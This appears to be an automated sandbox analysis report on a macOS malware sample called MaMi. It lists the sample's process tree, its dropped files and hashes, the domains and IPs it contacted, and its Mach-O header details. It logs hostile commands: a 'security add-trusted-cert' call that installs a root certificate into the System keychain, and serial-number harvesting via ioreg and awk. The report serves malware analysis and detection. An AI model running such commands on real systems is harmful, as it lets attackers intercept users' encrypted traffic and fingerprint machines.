IOPlatformSerialNumber keyword found in command: /usr/bin/awk /usr/bin/awk /IOPlatformSerialNumber/ { print $4 }

Stealing of Sensitive Information:

Executes the "security" command used to access the keychain

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Security executable: /usr/bin/security -> /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /Users/luke/Desktop/MaMi.bin

Imports (root) certificates into the systems keychain typically to intercept SSL traffic or bypass code integrity protections

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Certificate import: /usr/bin/security -> /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /Users/luke/Desktop/MaMi.bin

Runtime Messages

Command:	/Users/luke/Desktop/MaMi
Exitcode:	0
Killed:	False
Standard Output:
Standard Error:	2018-01-16 11:38:38.416 MaMi[513:4712] chmodding parent /var/root/Library/Cookies with perm 700

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Screenshot

Startup

system is macvm

xpcproxy (PID: 509 PPID: 1 MD5: d68b4c6f2056c73e1d3bd228bcd6d4ff)

diskmanagementd (PID: 509 PPID: 1 Overlayed Process Image: xpcproxy MD5: f6e81fe9e88497039d345998358093f9)

xpcproxy (PID: 512 PPID: 1 MD5: d68b4c6f2056c73e1d3bd228bcd6d4ff)

applessdstatistics (PID: 512 PPID: 1 Overlayed Process Image: xpcproxy MD5: fda40701d793e61c065b5b13d19b982a)

mono-sgen32 (PID: 513 PPID: 444 MD5: 8910349f44a940d8d79318367855b236)

MaMi (PID: 513 PPID: 444 Overlayed Process Image: mono-sgen32 MD5: 6e6034c13cb949156888513211b1f1ef)

echo (PID: 514 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 515 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 517 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 518 PPID: 517 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 518 PPID: 517 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 519 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 520 PPID: 519 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 520 PPID: 519 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 521 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 522 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 523 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 524 PPID: 523 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 524 PPID: 523 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 525 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 526 PPID: 525 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 526 PPID: 525 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

ioreg (PID: 527 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 528 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

ioreg (PID: 529 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 530 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

ioreg (PID: 531 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 532 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

stat (PID: 533 PPID: 513 MD5: e325a36f6628a912b814e915d466c994)

echo (PID: 534 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 535 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 536 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 537 PPID: 536 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 537 PPID: 536 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 538 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 539 PPID: 538 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 539 PPID: 538 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 540 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 541 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 542 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 543 PPID: 542 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 543 PPID: 542 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 544 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 545 PPID: 544 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 545 PPID: 544 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 546 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 547 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 548 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 549 PPID: 548 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 549 PPID: 548 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 550 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 551 PPID: 550 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 551 PPID: 550 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 552 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 553 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 554 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 555 PPID: 554 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 555 PPID: 554 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 556 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 557 PPID: 556 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 557 PPID: 556 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 558 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 559 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 560 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 561 PPID: 560 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 561 PPID: 560 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 562 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 563 PPID: 562 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 563 PPID: 562 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 564 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 565 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 566 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 567 PPID: 566 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 567 PPID: 566 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 568 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 569 PPID: 568 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 569 PPID: 568 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 570 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 571 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 572 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 573 PPID: 572 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 573 PPID: 572 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 574 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 575 PPID: 574 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 575 PPID: 574 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 576 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 577 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 578 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 579 PPID: 578 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 579 PPID: 578 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 580 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 581 PPID: 580 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 581 PPID: 580 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 582 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 583 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 584 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 585 PPID: 584 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 585 PPID: 584 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 586 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 587 PPID: 586 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 587 PPID: 586 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

ioreg (PID: 588 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 589 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

ioreg (PID: 590 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 591 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

echo (PID: 592 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 593 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 594 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 595 PPID: 594 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 595 PPID: 594 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 596 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 597 PPID: 596 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 597 PPID: 596 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

security (PID: 598 PPID: 513 MD5: 6323b6bd0865d2300eb65a512f8c560c)

echo (PID: 600 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 601 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 602 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 603 PPID: 602 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 603 PPID: 602 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 604 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 605 PPID: 604 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 605 PPID: 604 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 606 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 607 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 608 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 609 PPID: 608 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 609 PPID: 608 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 610 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 611 PPID: 610 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 611 PPID: 610 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 612 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 613 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 614 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 615 PPID: 614 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 615 PPID: 614 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 616 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 617 PPID: 616 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 617 PPID: 616 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 618 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 619 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 620 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 621 PPID: 620 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 621 PPID: 620 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 622 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 623 PPID: 622 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 623 PPID: 622 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 624 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 625 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 626 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 627 PPID: 626 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 627 PPID: 626 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 628 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 629 PPID: 628 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 629 PPID: 628 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

echo (PID: 630 PPID: 513 MD5: 28aaba1826ce568b1eec9cf71ad0655c)

scutil (PID: 631 PPID: 513 MD5: 606425562bb70289876036542086217c)

networksetup (PID: 632 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 633 PPID: 632 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 633 PPID: 632 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

networksetup (PID: 634 PPID: 513 MD5: 679d83de42bfa3589a8651a7408bdf66)

sh (PID: 635 PPID: 634 MD5: 2cc3c26641112c1bd0173f396b7d7662)

cp (PID: 635 PPID: 634 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)

ioreg (PID: 636 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 637 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

ioreg (PID: 638 PPID: 513 MD5: 940d0bc7df76362d3beb0757f4879ef6)

awk (PID: 639 PPID: 513 MD5: f3018baf92b308f79410d303b5186198)

cleanup

Created / dropped Files

/Library/Keychains/System.keychain.sb-ac2b63ed-m4tCkz
File Type:	data
Size (bytes):	33696
Entropy (8bit):	4.249455295583855
Encrypted:	false
MD5:	9DD3851D5FB343992F7DB778C97C56A4
SHA1:	7FFCAD715CB343B468C24B3271950B4938FC72F7
SHA-256:	882B665925BE90D45ACCAED36325B31DB0BCB0D3074F14DC22D283A552C590B6
SHA-512:	8528848DD41D36E89FDD093A28F05307CF6D983A5B893D8DF2451A08AC1EC3ECC5E136962AEC8F7C676C399712D6F421E6D3AFBF9884E5C8731440E91FB177F5
Malicious:	false
Reputation:	low

/Library/Preferences/SystemConfiguration/preferences.plist-lock
File Type:	ASCII text
Size (bytes):	12
Entropy (8bit):	2.0
Encrypted:	false
MD5:	08275E96591EEA52C64B0866004B02D3
SHA1:	B5DC7150EC53B6B802A64DFF4E65149DBDECD2CE
SHA-256:	959402A34FAB43E548CB7F1A4CBF53E341A3D536846A58E943C922ABE2FBC148
SHA-512:	BAAE4EEC184623B23109463FAF4F86409B74C8DC701A1A278A9141D9F44CF16731F51D14B581F1EF723B024BFB36672860FD8C59603456D7EA2945977463BF20
Malicious:	false
Reputation:	low

/Library/Preferences/SystemConfiguration/preferences.plist-new
File Type:	XML document text
Size (bytes):	4594
Entropy (8bit):	4.922151867635323
Encrypted:	false
MD5:	D29D035A55239D6A77A94EECD344313C
SHA1:	5C73FA173533B38F245B76B393ADBD4791EBBC84
SHA-256:	8838003894E4583853CEBCAB515338E0DB708AE15440B47BF5FAE254C80D0C14
SHA-512:	5F71B81D161E574DA1729A9E52262CD4C841B7E9CD395459220BACF149EA17067AAFD059A9A961C4B538678B2B3613A5BB5413E28DF7800CF3E05FDF745B45B5
Malicious:	false
Reputation:	low

/Library/Preferences/SystemConfiguration/preferences.plist.old
File Type:	XML document text
Size (bytes):	4594
Entropy (8bit):	4.922151867635323
Encrypted:	false
MD5:	D29D035A55239D6A77A94EECD344313C
SHA1:	5C73FA173533B38F245B76B393ADBD4791EBBC84
SHA-256:	8838003894E4583853CEBCAB515338E0DB708AE15440B47BF5FAE254C80D0C14
SHA-512:	5F71B81D161E574DA1729A9E52262CD4C841B7E9CD395459220BACF149EA17067AAFD059A9A961C4B538678B2B3613A5BB5413E28DF7800CF3E05FDF745B45B5
Malicious:	true
Reputation:	low

/Users/luke/Desktop/.dat.nosync0201.Jo8P8B
File Type:	data
Size (bytes):	1021
Entropy (8bit):	7.295459366431303
Encrypted:	false
MD5:	5FBB11485CD05D8986488D11EB22FEDD
SHA1:	26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
SHA-256:	C17861B640492388D50FF5DAC282ED502AEC9AD1AA4AA07DD977FA9AB2567C30
SHA-512:	99FFC26EBAACEC0155AA99FC6814CF0A7F1394DDA8B1796ED998F7B3B87472E512097ED7BBA1A834DDA1A73E90D17A76B0120F9C51AA7332265A98EF9C193713
Malicious:	true
Reputation:	low

/Users/luke/Library/Application Support/.dat.nosync0201.GCXGyu
File Type:	ASCII text, with no line terminators
Size (bytes):	100
Entropy (8bit):	5.6063701301561855
Encrypted:	false
MD5:	FB86CDB211DF8ED5E11672C7E3479249
SHA1:	B80C1DD0DF541674FD3B76906B52DF79E3553B62
SHA-256:	3BB51CC3D4ECD1E24C22AE17C635726A3875AAE5CDE4B125520D8E72633BF1B1
SHA-512:	C473726F516939295536F7BE1E6172D0487C063B20862E5C8AEBF6ED6101CC6DD86285C8C003D78A6DFA1E69F9FFF1DFDC5BDB1AA7DE85B772C5A5F6AD977EDB
Malicious:	false
Reputation:	low

/dev/null
File Type:	ASCII text
Size (bytes):	29
Entropy (8bit):	4.306256857196538
Encrypted:	false
MD5:	5BB01FE1F6043852CD6138586BC463D7
SHA1:	2E2514514532E95DE6DD638C0C490E264801E658
SHA-256:	70780754EA748E33B105EB1FCA355B25777D4296A46D8CBC8C8B73FA7724DBA6
SHA-512:	DB87579A98F4DF6F2A94F5318E51CD6F2634FAF307DEF7E2B98435F8D4F7D32157C452C6332E4E3BACEE4CF041101DE8AEC24B2915B9021CCF7D1E746618DBAF
Malicious:	false
Reputation:	low

/private/var/root/Library/Cookies/MaMi.binarycookies_tmp_513_0.dat
File Type:	data
Size (bytes):	777
Entropy (8bit):	4.420222670133278
Encrypted:	false
MD5:	BBE2E55DE6FE2A888EE4AEA9E5325A4D
SHA1:	8A16748B5F1B3316C26781966714B6F57360B735
SHA-256:	D5DB52D3BBFA3D7EAB97CE2496D2BE26C6F8A80A76DAFE8EAD0B732ACE722735
SHA-512:	423561D0BDE495F384AF06976D01BFC5E30A6180A38CA0A117F27E8FEF91B6625AEFBF25372D58426192610ECE1D2AB38E232521A1FDD10E6902B1CFF5232208
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious
squartera.info	104.31.80.139	true	false
gorensin.info	104.27.134.218	true	false
honouncil.info	104.28.13.190	true	false

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
104.28.13.190	United States	13335	CLOUDFLARENET-CloudFlareIncUS	false
23.45.113.221	United States	20940	AKAMAI-ASN1US	false
82.163.142.137	United Kingdom	204078	GREENTEAMIL	false
23.45.112.74	United States	20940	AKAMAI-ASN1US	false
72.21.91.29	United States	15133	EDGECAST-MCICommunicationsServicesIncdbaVerizonB	false
8.8.8.8	United States	15169	GOOGLE-GoogleIncUS	false
104.27.134.218	United States	13335	CLOUDFLARENET-CloudFlareIncUS	false
82.163.143.135	United Kingdom	204078	GREENTEAMIL	false
104.31.80.139	United States	13335	CLOUDFLARENET-CloudFlareIncUS	false
17.253.54.125	United States	6185	APPLE-AUSTIN-AppleIncUS	false

Static File Info

General
File type:	Mach-O 64-bit executable
Entropy (8bit):	6.047403534655477
TrID:	Mac OS X Mach-O 64bit Intel executable (4004/1) 100.00%
File name:	MaMi
File size:	565673
MD5:	6e6034c13cb949156888513211b1f1ef
SHA1:	f596b8ae209a1600a33a230e9904472b6d4ba1c0
SHA256:	5586be30d505216bdc912605481f9c8c7bfd52748f66c5e212160f6b31fd8571
SHA512:	5e67267e14cd1fa694c00ff4d7c854407888bfff11a54e3e63006fe332933ead3584efc2b584a95976c91785c0027fd2f4a936fa48984a381cef567b1a9d0b17
File Content Preview:	....................P.....!.........H...__PAGEZERO..............................................................__TEXT................... ............... ......................__text..........__TEXT...................@.....................................

Static Mach Info

General Informations for header0
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	27

segment_command_64

Name	Value
segname	__PAGEZERO
fileoff	0
maxprot	0
vmsize	4294967296
nsects	0
flags	0
filesize	0
vmaddr	0
initprot	0

segment_command_64

Name	Value
segname	__TEXT
fileoff	0
maxprot	7
vmsize	335872
nsects	11
flags	0
filesize	335872
vmaddr	4294967296
initprot	5
Datas	sectname	__text
	segname	__TEXT
	reloff	0
	addr	4294973824
	align	4
	nreloc	0
	flags	2147484672
	offset	6528
	reserved2	0
	reserved1	0
	reserved3	0
	size	213122
	sectname	__stubs
	segname	__TEXT
	reloff	0
	addr	4295186946
	align	1
	nreloc	0
	flags	2147484680
	offset	219650
	reserved2	6
	reserved1	0
	reserved3	0
	size	1344
	sectname	__stub_helper
	segname	__TEXT
	reloff	0
	addr	4295188292
	align	2
	nreloc	0
	flags	2147484672
	offset	220996
	reserved2	0
	reserved1	0
	reserved3	0
	size	2216
	sectname	__const
	segname	__TEXT
	reloff	0
	addr	4295190512
	align	4
	nreloc	0
	flags	0
	offset	223216
	reserved2	0
	reserved1	0
	reserved3	0
	size	1176
	sectname	__gcc_except_tab
	segname	__TEXT
	reloff	0
	addr	4295191688
	align	2
	nreloc	0
	flags	0
	offset	224392
	reserved2	0
	reserved1	0
	reserved3	0
	size	5364
	sectname	__cstring
	segname	__TEXT
	reloff	0
	addr	4295197056
align	4
nreloc	0
flags	2
offset	229760
reserved2	0
reserved1	0
reserved3	0
size	25864
sectname	__objc_methname
segname	__TEXT
reloff	0
addr	4295222920
align	0
nreloc	0
flags	2
offset	255624
reserved2	0
reserved1	0
reserved3	0
size	24247
sectname	__objc_classname
segname	__TEXT
reloff	0
addr	4295247167
align	0
nreloc	0
flags	2
offset	279871
reserved2	0
reserved1	0
reserved3	0
size	509
sectname	__objc_methtype
segname	__TEXT
reloff	0
addr	4295247676
align	0
nreloc	0
flags	2
offset	280380
reserved2	0
reserved1	0
reserved3	0
size	3133
sectname	__unwind_info
segname	__TEXT
reloff	0
addr	4295250812
align	2
nreloc	0
flags	0
offset	283516
reserved2	0
reserved1	0
reserved3	0
size	4944
sectname	__eh_frame
segname	__TEXT
reloff	0
addr	4295255760
align	3
nreloc	0
flags	0
offset	288464
reserved2	0
reserved1	0
reserved3	0
size	47400

segment_command_64

Name	Value
segname	__DATA
fileoff	335872
maxprot	7
vmsize	81920
nsects	20
flags	0
filesize	77824
vmaddr	4295303168
initprot	3
Datas	sectname	__nl_symbol_ptr
	segname	__DATA
	reloff	0
	addr	4295303168
	align	3
	nreloc	0
	flags	6
	offset	335872
	reserved2	0
	reserved1	224
	reserved3	0
	size	16
	sectname	__got
	segname	__DATA
	reloff	0
	addr	4295303184
	align	3
	nreloc	0
	flags	6
	offset	335888
	reserved2	0
	reserved1	226
	reserved3	0
	size	800
	sectname	__la_symbol_ptr
	segname	__DATA
	reloff	0
	addr	4295303984
	align	3
	nreloc	0
	flags	7
	offset	336688
	reserved2	0
	reserved1	326
	reserved3	0
	size	1792
	sectname	__const
	segname	__DATA
	reloff	0
	addr	4295305776
	align	4
	nreloc	0
	flags	0
	offset	338480
	reserved2	0
	reserved1	0
	reserved3	0
	size	592
	sectname	__cfstring
	segname	__DATA
	reloff	0
	addr	4295306368
	align	3
	nreloc	0
	flags	0
	offset	339072
	reserved2	0
	reserved1	0
	reserved3	0
	size	19520
	sectname	__objc_classlist
	segname	__DATA
	reloff	0
	addr	4295325888
align	3
nreloc	0
flags	268435456
offset	358592
reserved2	0
reserved1	0
reserved3	0
size	176
sectname	__objc_nlclslist
segname	__DATA
reloff	0
addr	4295326064
align	3
nreloc	0
flags	268435456
offset	358768
reserved2	0
reserved1	0
reserved3	0
size	8
sectname	__objc_catlist
segname	__DATA
reloff	0
addr	4295326072
align	3
nreloc	0
flags	268435456
offset	358776
reserved2	0
reserved1	0
reserved3	0
size	16
sectname	__objc_protolist
segname	__DATA
reloff	0
addr	4295326088
align	3
nreloc	0
flags	0
offset	358792
reserved2	0
reserved1	0
reserved3	0
size	64
sectname	__objc_imageinfo
segname	__DATA
reloff	0
addr	4295326152
align	2
nreloc	0
flags	0
offset	358856
reserved2	0
reserved1	0
reserved3	0
size	8
sectname	__objc_const
segname	__DATA
reloff	0
addr	4295326160
align	3
nreloc	0
flags	0
offset	358864
reserved2	0
reserved1	0
reserved3	0
size	36840
sectname	__objc_selrefs
segname	__DATA
reloff	0
addr	4295363000
align	3
nreloc	0
flags	268435461
offset	395704
reserved2	0
reserved1	0
reserved3	0
size	7472
sectname	__objc_protorefs
segname	__DATA
reloff	0
addr	4295370472
align	3
nreloc	0
flags	0
offset	403176
reserved2	0
reserved1	0
reserved3	0
size	16
sectname	__objc_classrefs
segname	__DATA
reloff	0
addr	4295370488
align	3
nreloc	0
flags	268435456
offset	403192
reserved2	0
reserved1	0
reserved3	0
size	592
sectname	__objc_superrefs
segname	__DATA
reloff	0
addr	4295371080
align	3
nreloc	0
flags	268435456
offset	403784
reserved2	0
reserved1	0
reserved3	0
size	144
sectname	__objc_ivar
segname	__DATA
reloff	0
addr	4295371224
align	3
nreloc	0
flags	0
offset	403928
reserved2	0
reserved1	0
reserved3	0
size	1544
sectname	__objc_data
segname	__DATA
reloff	0
addr	4295372768
align	3
nreloc	0
flags	0
offset	405472
reserved2	0
reserved1	0
reserved3	0
size	1840
sectname	__data
segname	__DATA
reloff	0
addr	4295374608
align	4
nreloc	0
flags	0
offset	407312
reserved2	0
reserved1	0
reserved3	0
size	3232
sectname	__bss
segname	__DATA
reloff	0
addr	4295377840
align	4
nreloc	0
flags	1
offset	0
reserved2	0
reserved1	0
reserved3	0
size	5056
sectname	__common
segname	__DATA
reloff	0
addr	4295382896
align	4
nreloc	0
flags	1
offset	0
reserved2	0
reserved1	0
reserved3	0
size	273

segment_command_64

Name	Value
segname	__LINKEDIT
fileoff	413696
maxprot	7
vmsize	151552
nsects	0
flags	0
filesize	149624
vmaddr	4295385088
initprot	1

dyld_info_command

Name	Value
lazy_bind_size	7240
lazy_bind_off	421768
weak_bind_size	1496
rebase_size	1264
export_off	429008
export_size	8160
bind_off	414960
rebase_off	413696
bind_size	5312
weak_bind_off	420272

symtab_command

Name	Value
strsize	87504
symoff	438672
stroff	475816
nsyms	2184

dysymtab_command

Name	Value
extreloff	0
nlocrel	0
indirectsymoff	473616
modtaboff	0
nextrel	0
iundefsym	1807
nmodtab	0
ilocalsym	0
nundefsym	377
nextrefsyms	0
locreloff	0
ntoc	0
nlocalsym	1514
tocoff	0
extrefsymoff	0
nindirectsyms	550
iextdefsym	1514
nextdefsym	293

